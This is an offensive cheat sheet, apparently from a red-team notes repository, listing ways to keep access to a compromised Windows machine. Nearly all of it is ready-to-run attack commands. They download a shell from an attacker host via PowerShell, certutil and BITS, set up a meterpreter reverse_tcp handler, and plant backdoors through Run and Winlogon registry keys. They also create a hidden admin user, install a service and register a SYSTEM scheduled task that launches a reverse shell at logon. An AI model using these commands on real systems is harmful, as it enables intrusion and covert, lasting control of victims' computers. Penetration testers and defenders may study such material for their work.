killchain-compendium/persistence/persistence.md

Persistence

• Gain through
  • Startup folder persistence
  • Editing registry keys
  • Scheduled tasks
  • SUID
  • BITS
  • Creating a backdoored service
  • Creat user
  • RDP

Gain Persistence on Windows

• Browser. Add to trusted sites.
• Powershell

Invoke-WebRequest http://<attacker-IP>:<attackerPort>/shell.exe -OutFile .\shell2.exe

• DOSprompt

certutil -urlcache -split -f http://<attacker-IP>:<attacker-Port/shell.exe

• Use multi/handler on attacker and set PAYLOAD windows/meterpreter/reverse_tcp

Paths to Persistence

• Put in startup directory

C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup

• Put the reverse_shell into %appdata% and add a registry key

reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v Backdoor /t REG_SZ /d "C:\Users\<USER>\AppData\Roaming\backdoor.exe" 

Background Intelligence Transfer Service (BITS)

bitsadmin /create __shell__
bitsadmin /addfile __shell__ "http://<attacker-IP>:<attacker-Port>/shell2.exe" "C:\Users\<USER>\Documents\shell2.exe"

bitsadmin /SetNotifyCmdLine 1 cmd.exe  "/c shell2.exe /complete __shell__ | start /B C:\Users\<USER>\Documents\shell2.exe"
bitsadmin /SetMinRetryDelay 30
bitsadmin /resume

High Priv

• Create user net user /add <user> <pass>
• Add to admin group via net localgroup Administrator <user> /add
• Check net localgroup Administrator

Add to registry

• Execute on user logon via

reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /d "Userinit.exe, C:\yadda\shell2.exe" /f

Add a Service

• Inside meterpreter load powershell and powershell_shell

New-Service -Name "<SERVICE_NAME>" -BinaryPathName "<PATH_TO_BINARY>" -Description "<SERVICE_DESCRIPTION>" -StartupType "Boot"

Add Scheduled Task

$A = New-ScheduledTaskAction -Execute "cmd.exe" -Argument "/c C"\Users\Administrator\Documents\rshell.exe
$B = New-ScheduledTaskTrigger -AtLogOn
$C = New-ScheduledTaskPrincipal -UserId "NT AUTHORITY/SYSTEM" -RunLevel Highest
$D = New-ScheduledTaskSettingsSet
$E = New-ScheduledTask -Action $A -Trigger $B -Principal $C -Settings $D
Register-ScheduledTask ReverseShell -InputObject $E